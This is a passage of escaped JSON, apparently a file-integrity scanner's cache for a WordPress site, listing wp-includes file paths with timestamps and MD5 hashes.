d51ecabf7fc4fb078982\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/jquery.form.js\":{\"d\":1501929048,\"h\":\"d08a6e3d69ffe1088166ae1983e2355d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/jquery.ui.touch-punch.js\":{\"d\":1334104104,\"h\":\"4cc86d1003c45134d6838f13e3885db1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/jquery.schedule.js\":{\"d\":1199977548,\"h\":\"0426b39754aa6bc766d89ea4c41bbd06\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/jquery.table-hotkeys.js\":{\"d\":1384483570,\"h\":\"a706ead694231e74fd6750b1670580a5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/jquery.query.js\":{\"d\":1359483752,\"h\":\"3bcc587af2c7b01fc6fbc9c077050143\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jquery\\/jquery.form.min.js\":{\"d\":1501929048,\"h\":\"4534fa47fab86ef0aca5345e30ddf509\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/swfupload\\/license.txt\":{\"d\":1311958282,\"h\":\"cbe05bb060c85e07882dc06ff751577a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/swfupload\\/swfupload.js\":{\"d\":1506002748,\"h\":\"ccd72399988bf939dce13e2659526711\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/swfupload\\/handlers.js\":{\"d\":1506002748,\"h\":\"c2c1ec2ac323cd308b2dc6d58370f514\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/swfupload\\/handlers.min.js\":{\"d\":1506002748,\"h\":\"6a8fbcda994be17e7109f588fcd8633d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/crop\\/cropper.js\":{\"d\":1178306324,\"h\":\"1d97b296d918482e1273c56fbff6a8e2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/crop\\/cropper.css\":{\"d\":1356009932,\"h\":\"6b79350bf46e0f692a4d1b2807ed0399\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jcrop\\/jquery.Jcrop.min.js\":{\"d\":1379758570,\"h\":\"2f61ab984c177275c71e34ff1a17c102\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/jcrop\\/jquery.Jcrop.min.css\":{\"d\":1379758570,\"h\":\"56cc9ea201dc2f4b910e78bfacac9211\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/imgareaselect\\/jquery.imgareaselect.js\":{\"d\":1521914202,\"h\":\"63ec4a65e41151dfd5c85e88fc98a42c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/imgareaselect\\/imgareaselect.css\":{\"d\":1335381598,\"h\":\"7d28cad92829b3d633a087b5f3b595af\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/imgareaselect\\/jquery.imgareaselect.min.js\":{\"d\":1522776098,\"h\":\"959b49d52e2ff3abd7b9e48440679dff\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/media-models.min.js\":{\"d\":1539135984,\"h\":\"8581d9247dda1ddbdbc45bc7cba3a3fd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/comment-reply.js\":{\"d\":1503588524,\"h\":\"01183853cffabcfc771e87e405727059\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/media-models.js\":{\"d\":1539135984,\"h\":\"42280316bc7695cce608c075247712bb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/wp-custom-header.js\":{\"d\":1504887170,\"h\":\"3e2d55e5318d81a5281421f688e58323\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/media-grid.min.js\":{\"d\":1539135984,\"h\":\"1af7b5cd2620f279bc60b87c301079ba\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/colorpicker.js\":{\"d\":1353156090,\"h\":\"f01017ca562067f4840eb2b6f99f2daf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/wp-emoji.js\":{\"d\":1470334892,\"h\":\"ddc49ad0e4b146cc8ff73d976f1298bb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/customize-selective-refresh.min.js\":{\"d\":1539135686,\"h\":\"aefff2962b2f3da789019ca890e97f83\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/wplink.min.js\":{\"d\":1547081519,\"h\":\"caec3c62a9d482aea3a07473ba2fc765\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/media-audiovideo.min.js\":{\"d\":1539135984,\"h\":\"454d6c7240151c150a4d52a169cf5ff7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/media-views.min.js\":{\"d\":1539135984,\"h\":\"7db21b9f1e3f67da3217e7e8168283a0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/heartbeat.js\":{\"d\":1542906646,\"h\":\"4b47f8e4c39036d98dc243d9a29946e2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/zxcvbn-async.min.js\":{\"d\":1539135686,\"h\":\"3196e9b61f703909e139ce7e049a7ffd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/customize-loader.js\":{\"d\":1507556088,\"h\":\"a2c8b624e5fad7d54a01eb87471d66b0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/json2.min.js\":{\"d\":1539135686,\"h\":\"35d899a81986173f44f9bbe686cc583c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/twemoji.min.js\":{\"d\":1539135686,\"h\":\"47008e6186dfd2a8ea800d7d17158824\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/customize-views.min.js\":{\"d\":1539135686,\"h\":\"000d91b0de96556e03c3053f728b2987\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/wpdialog.min.js\":{\"d\":1539135686,\"h\":\"d22d9fa5bb00ba0667080da846c4a1be\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/wp-api.js\":{\"d\":1539886766,\"h\":\"a035f4ac1a1b03b0221e038d9aea637e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/wp-embed-template.min.js\":{\"d\":1539135686,\"h\":\"c05d678a8197a72c4a44bf540017278a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/wp-backbone.min.js\":{\"d\":1539135686,\"h\":\"b978d3c20a25ca1d36c1688c298c8239\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/api-request.min.js\":{\"d\":1539965020,\"h\":\"b1ae1aa42eaf4df3fdc59777f5ec7437\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/customize-models.min.js\":{\"d\":1539135686,\"h\":\"1f1c22726066146cbe889da7288dd45b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/customize-base.min.js\":{\"d\":1539135686,\"h\":\"0bcc3681daa40ee2e0ecee241388a898\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/wp-auth-check.min.js\":{\"d\":1539135686,\"h\":\"99c97a7d6ad9e1ba06bbd76f29ecaad6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/wp-emoji.min.js\":{\"d\":1539135686,\"h\":\"1acdd0cd523695bd920ccc418b0678c9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/autosave.min.js\":{\"d\":1539135686,\"h\":\"c2366b7de7027d09661ecdde0c8d1025\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/customize-models.js\":{\"d\":1507120188,\"h\":\"28a921114915381d0837f90180e29f9c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/quicktags.min.js\":{\"d\":1539135686,\"h\":\"f371f1d8aef9c3cb12cbdfa97cf7bd2f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/wp-embed.min.js\":{\"d\":1539221424,\"h\":\"2dce40d16f9ff6332d3cbb7ae488a2b9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/json2.js\":{\"d\":1444131146,\"h\":\"73a1d77b4e827c45061f4fab041030a9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/wp-lists.min.js\":{\"d\":1539135686,\"h\":\"7df18b42cbd5cbaa5067c06f57aa876b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/wp-pointer.js\":{\"d\":1504887170,\"h\":\"35383aaf79e2b149c48a6acbc6c83809\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/wp-a11y.js\":{\"d\":1507067446,\"h\":\"711c49a2ed00535aa8aa3fc7af0a2420\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/wp-api.min.js\":{\"d\":1539886766,\"h\":\"8cf9672daeca232b3c1f93b1e8d130b0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/customize-loader.min.js\":{\"d\":1539135686,\"h\":\"31d9f8e828b08e3de1c3922fd12161ad\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/customize-preview-widgets.min.js\":{\"d\":1539135686,\"h\":\"a5f3b545a796e07e300f08d3c1e5386b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/wplink.js\":{\"d\":1547081519,\"h\":\"ad293791760966322c4dda8bc3329848\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/twemoji.js\":{\"d\":1531454846,\"h\":\"4d33a4ad65ec90364e2c52aca8badf11\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/colorpicker.min.js\":{\"d\":1539135686,\"h\":\"e186209dc41a59f2fb627c24e640712d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tw-sack.js\":{\"d\":1345671258,\"h\":\"b989a5bd84f6ebcbc1393ec003e6e991\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/media-views.js\":{\"d\":1539135984,\"h\":\"8806dd8e94b70370229f76b85c035efd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/underscore.min.js\":{\"d\":1455713546,\"h\":\"6a3a434a1360cc744341e97de9177bc6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/admin-bar.js\":{\"d\":1437413544,\"h\":\"d97a1899a7f641e693928f5a47c33de4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/utils.js\":{\"d\":1500124726,\"h\":\"0cb234c48b5a81baaaaa30f570199d9d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/zxcvbn-async.js\":{\"d\":1384290790,\"h\":\"97a79e96a815b200139356055d752333\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/shortcode.js\":{\"d\":1504887170,\"h\":\"6e3848c6ea0f681f669a0c8f942bf41b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/media-audiovideo.js\":{\"d\":1539135984,\"h\":\"4879c39c078d74b588260e5c73e9d141\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/wp-list-revisions.js\":{\"d\":1384487650,\"h\":\"47510d7560d22a974c8c0eec6e24bcbd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/mce-view.min.js\":{\"d\":1539135686,\"h\":\"280263cbe063651d578398c8d4046cc8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/media-grid.js\":{\"d\":1539135984,\"h\":\"bc5625b3c5dec3a72a57e8456c548904\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/zxcvbn.min.js\":{\"d\":1481619222,\"h\":\"a0ba2f2c8a1dd2594208e4f45b50b390\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/utils.min.js\":{\"d\":1539135686,\"h\":\"f6e3d57217de41fa3243331155452bb1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/wp-sanitize.js\":{\"d\":1507134528,\"h\":\"c82ddb34090cba66aff7d12291e75f21\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/admin-bar.min.js\":{\"d\":1539135686,\"h\":\"b2e733f0c117e30ac8974dcc69ab11d8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/customize-base.js\":{\"d\":1507597494,\"h\":\"44c9ce1c5ef5e1516a8bcc08f42931a2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/hoverIntent.min.js\":{\"d\":1539135686,\"h\":\"ca500ade854c31417faf5762e31b9d00\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/wp-pointer.min.js\":{\"d\":1539135686,\"h\":\"368f987c644d70580097e48066c99082\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/wp-util.min.js\":{\"d\":1539135686,\"h\":\"83118aa939b5832dd4e1cad8b186012c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/wp-emoji-loader.js\":{\"d\":1531454846,\"h\":\"67225f16229b76c9f2a0c46a15182781\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/wp-embed.js\":{\"d\":1539221424,\"h\":\"74194cbcf228ab10c16d37fded70705b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/wp-lists.js\":{\"d\":1475510970,\"h\":\"a3ad4f080bd61da2b9f2f9390b1533d1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/comment-reply.min.js\":{\"d\":1539135686,\"h\":\"56bc2726d829207bfa802f957aac0791\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/wp-ajax-response.js\":{\"d\":1520545542,\"h\":\"4134afac564acdd0f18f6cd705ee7759\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/wp-emoji-release.min.js\":{\"d\":1539135686,\"h\":\"15d0c302dc74fd87bd9cfeab513e13e4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/customize-selective-refresh.js\":{\"d\":1517315202,\"h\":\"527d1e0957b88a45d872f4a318e8ec13\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/hoverIntent.js\":{\"d\":1426085128,\"h\":\"cab3598b438a9e63984f1c6e9dd79b01\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/customize-views.js\":{\"d\":1504887170,\"h\":\"1e619b769bf8f798e13112e221949e02\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/wp-embed-template.js\":{\"d\":1467726418,\"h\":\"d6c3fb049f657928eac2cd9c7eef6925\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/customize-preview.js\":{\"d\":1509641868,\"h\":\"8ac9f2b666eaa82f047005ba79834f95\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/heartbeat.min.js\":{\"d\":1542906646,\"h\":\"37ce90356b4d2587270f9f9fce795035\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/wp-a11y.min.js\":{\"d\":1539135686,\"h\":\"7fb5f1a0757b4fc79ac7c5b1920e0f8e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/wp-auth-check.js\":{\"d\":1452696748,\"h\":\"99500dd54adc76769e1a798a9725d765\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/media-editor.min.js\":{\"d\":1539135686,\"h\":\"79cf51bae2593b7ac27b73789e43646d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/swfobject.js\":{\"d\":1334695170,\"h\":\"9ffdba2cff497d701684657e329871f5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/customize-preview-nav-menus.min.js\":{\"d\":1539135686,\"h\":\"526952e7a87a339b276f5dcfc96c5176\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/customize-preview-widgets.js\":{\"d\":1508127408,\"h\":\"8ff9fe7ca1dadd92d11ffa20b353c518\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/autosave.js\":{\"d\":1504887170,\"h\":\"9b1d754d27a657a24b8268d87a4a96ad\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/api-request.js\":{\"d\":1539965020,\"h\":\"5ec7c2daa2cde305e46eb4fd32c9bc92\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/mce-view.js\":{\"d\":1513133380,\"h\":\"f2e51a6cc3a8ea3f6d149602645bcb91\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/quicktags.js\":{\"d\":1494453582,\"h\":\"bb36c516f8fd9ecc5d05b750f92cc1ae\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/masonry.min.js\":{\"d\":1467130712,\"h\":\"5420b6516c14245b504e7240a8310f2c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/backbone.min.js\":{\"d\":1466060250,\"h\":\"9263ddbe52f85e7be13301ac26889c8e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/wp-custom-header.min.js\":{\"d\":1539135686,\"h\":\"802bee0e5f600483e0247f59b3b329b4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/wp-util.js\":{\"d\":1504887170,\"h\":\"3ec17cf08572d621367a0573351441aa\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/wp-backbone.js\":{\"d\":1504887170,\"h\":\"65105a0048efed09300417b61ad18cc9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/wp-emoji-loader.min.js\":{\"d\":1539135686,\"h\":\"0ac3cd92fe3f0052da47e55c729df482\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/customize-preview-nav-menus.js\":{\"d\":1504887170,\"h\":\"a475fa643ad31db4aaa72d48169ee109\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/media-editor.js\":{\"d\":1504887170,\"h\":\"af1d6c3eb0ea441600d4a7f2ac4c7c4e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/wp-sanitize.min.js\":{\"d\":1539135686,\"h\":\"60b4efeac56fd08f7ba4f0f48e915dae\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/shortcode.min.js\":{\"d\":1539135686,\"h\":\"1c041f7f933a23946e80dc51b5e1c938\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/wp-list-revisions.min.js\":{\"d\":1539135686,\"h\":\"d252f431d400b696e25ca9fec9a1113e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/tw-sack.min.js\":{\"d\":1539135686,\"h\":\"bc4487194e1f88126b8a500ad47e6889\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/wpdialog.js\":{\"d\":1388265796,\"h\":\"72e8395fd44d4039009c5396888fa6ba\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/customize-preview.min.js\":{\"d\":1539135686,\"h\":\"f4d0c657b387dd0a32fa0f98d7cf5b04\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/imagesloaded.min.js\":{\"d\":1539135686,\"h\":\"d0c2c0d7e37652e66657c8c8d6376442\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/js\\/wp-ajax-response.min.js\":{\"d\":1539135686,\"h\":\"20d3d94221f3642fe34a6e578c435dcb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/blocks\\/latest-posts.php\":{\"d\":1543575286,\"h\":\"aeefddbbe17ff30500d45347e1bd6b56\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/blocks\\/block.php\":{\"d\":1545267191,\"h\":\"738914db33e13d02689a3ba40674ab4b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/blocks\\/shortcode.php\":{\"d\":1543562992,\"h\":\"6da2b6fc9b79aac7a88ba1fcaf8e4533\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/blocks\\/archives.php\":{\"d\":1543575286,\"h\":\"7d407d1a1eddae22c52a7073b79cceff\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/blocks\\/categories.php\":{\"d\":1545267191,\"h\":\"7e939d80a7cf043f3d679c169e21af1a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/blocks\\/latest-comments.php\":{\"d\":1545267191,\"h\":\"4c5428427510c567b4c6ebe15de850f8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/ID3\\/module.tag.id3v1.php\":{\"d\":1501521646,\"h\":\"e84a7a19422594d35b6790ec582380bd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/ID3\\/module.audio.ac3.php\":{\"d\":1501521646,\"h\":\"ae54c9744bec8480b9310907b3db2374\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/ID3\\/license.txt\":{\"d\":1435441646,\"h\":\"35d98aadf8f7cc6851336651f7a66b98\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/ID3\\/module.audio-video.flv.php\":{\"d\":1501521646,\"h\":\"082564998a44a982b1f3417a69c41433\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/ID3\\/module.audio-video.matroska.php\":{\"d\":1501521646,\"h\":\"6b93f4b72b38b6d104e7b8742c415ef8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/ID3\\/getid3.lib.php\":{\"d\":1501521646,\"h\":\"f86631036038031d106377db00ccef3a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/ID3\\/module.audio-video.asf.php\":{\"d\":1501521646,\"h\":\"0a250d84a4380f86fa833b65d67d79f3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/ID3\\/module.tag.apetag.php\":{\"d\":1501521646,\"h\":\"88e2806267563bea7074de278a84d4bd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/ID3\\/module.audio-video.riff.php\":{\"d\":1501521646,\"h\":\"dd5477fe1cce0fdcf760d8e33c84ba9b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/ID3\\/module.tag.lyrics3.php\":{\"d\":1501521646,\"h\":\"89bf108a53e0085638931aa56755bc3a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/ID3\\/module.tag.id3v2.php\":{\"d\":1501521646,\"h\":\"7a1f61c7ac9d7f2f5f05f39c9e1acaf3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/ID3\\/module.audio.mp3.php\":{\"d\":1501521646,\"h\":\"47e2f789a9cdbfe8067190b4c50086b9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/ID3\\/module.audio.dts.php\":{\"d\":1435441646,\"h\":\"f3ea566007c94c03372eb6f46c5d2001\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/ID3\\/getid3.php\":{\"d\":1501521646,\"h\":\"7d8c0db1e4b777223e17d65819fb2b6f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/ID3\\/module.audio-video.quicktime.php\":{\"d\":1501521646,\"h\":\"a58663536509747b6ed7e69b911fb99a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/ID3\\/readme.txt\":{\"d\":1410453438,\"h\":\"9396dfe1c69c938eb17f564c4e5bab18\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/ID3\\/license.commercial.txt\":{\"d\":1435441646,\"h\":\"0a3b670896fc4a8067adb2c6d978418e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/ID3\\/module.audio.flac.php\":{\"d\":1435441646,\"h\":\"055003ea7c0388fd73107113d3ed3bc3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/ID3\\/module.audio.ogg.php\":{\"d\":1501521646,\"h\":\"59843dc0f4115a9e5652eab6811f9184\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/fonts\\/dashicons.eot\":{\"d\":1458323786,\"h\":\"30e410c715c6215fa7faa1c979b6480c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/fonts\\/dashicons.ttf\":{\"d\":1458323786,\"h\":\"8fea1fce46bafe469ba2f101fdc583e2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/fonts\\/dashicons.woff\":{\"d\":1458323786,\"h\":\"0c1c1ad41c025f72592bca820e073bec\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/random_compat\\/random_bytes_dev_urandom.php\":{\"d\":1512088662,\"h\":\"66210ed7a7e6d397af12ee87412687b0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/random_compat\\/random_bytes_openssl.php\":{\"d\":1512088662,\"h\":\"bb38b090812ec48acdd841ee43b411c3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/random_compat\\/error_polyfill.php\":{\"d\":1445565146,\"h\":\"c25954e57e1ae32722fa6c840a55658c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/random_compat\\/random_bytes_libsodium.php\":{\"d\":1512088662,\"h\":\"5c2fca1a67bac0e0e09ec0f2e38d240d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/random_compat\\/random_bytes_com_dotnet.php\":{\"d\":1512088662,\"h\":\"52d3240d3549e4c0cd785a62f31c463d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/random_compat\\/random_int.php\":{\"d\":1512088662,\"h\":\"4fc24fc8f4dd612539e347b210ea8c70\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/random_compat\\/random_bytes_libsodium_legacy.php\":{\"d\":1512088662,\"h\":\"8bf32de4bcf246d2c85d3178fd36e115\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/random_compat\\/byte_safe_strings.php\":{\"d\":1457448328,\"h\":\"fc75c18c95d974a9fdb1b101f66f7969\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/random_compat\\/cast_to_int.php\":{\"d\":1457448328,\"h\":\"fa5f76745ac2d63b9466f130d35c7fb1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/random_compat\\/random_byt